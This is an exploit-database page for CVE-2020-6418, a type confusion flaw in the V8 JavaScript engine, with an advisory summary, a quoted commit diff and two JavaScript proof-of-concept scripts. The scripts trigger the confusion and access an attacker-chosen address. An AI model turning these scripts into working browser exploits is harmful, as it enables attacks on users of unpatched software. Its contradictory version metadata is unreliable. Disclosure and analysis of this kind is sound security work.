header-logo
Suggest Exploit
vendor:
V8
by:
Anonymous
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: V8
Affected Version From: V8 version 8.4.371.18 and earlier
Affected Version To: V8 version 8.4.371.19 and later
Patch Exists: YES
Related CWE: CVE-2020-6418
CPE: a:google:v8
Metasploit: https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/microsoft-edge-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2020-6418/
Other Scripts: N/A
Platforms Tested: All
2020

V8 JavaScript Engine Type Confusion Vulnerability

A type confusion vulnerability exists in the V8 JavaScript engine due to incorrect optimization of the LoadElimination::ReduceTransitionElementsKind function. This lack may lead CheckMap instructions to be removed incorrectly, allowing an attacker to access memory locations that should not be accessible. A proof-of-concept (PoC) demonstrating type confusion is provided in the text.

Mitigation:

Upgrade to V8 version 8.4.371.19 or later.
Source

Exploit-DB raw data:

/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b

Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
       object_maps.remove(source_map, zone());
       object_maps.insert(target_map, zone());
-      AliasStateInfo alias_info(state, object, source_map);
-      state = state->KillMaps(alias_info, zone());
-      state = state->AddMaps(object, object_maps, zone());
+      state = state->SetMaps(object, object_maps, zone());
     }
...
}

I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.

A PoC demonstrating type confusion:
*/

function opt(a, b) {
    b[0] = 0;

    a.length;

    // TransitionElementsKind
    for (let i = 0; i < 1; i++)
        a[0] = 0;

    // CheckMap removed, type confusion
    b[0] = 9.431092e-317;  // 0x1234567
}

let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);

let arr2 = [0.1];
opt(arr2, arr2);

%OptimizeFunctionOnNextCall(opt);

opt(arr2, arr2);
arr2[0].x  // access 0x1234566

Without natives syntax:
function opt(a, b) {
    b[0] = 0;

    a.length;

    // TransitionElementsKind
    for (let i = 0; i < 1; i++)
        a[0] = 0;

    b[0] = 9.431092e-317;  // 0x1234567

    // Force optimization
    for (let i = 0; i < 10000000; i++) {

    }
}

let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);

let arr2 = [0.1];
opt(arr2, arr2);

opt(arr2, arr2);
arr2[0].x  // access 0x1234566

Navigation

Suggest Exploit

Services By CQR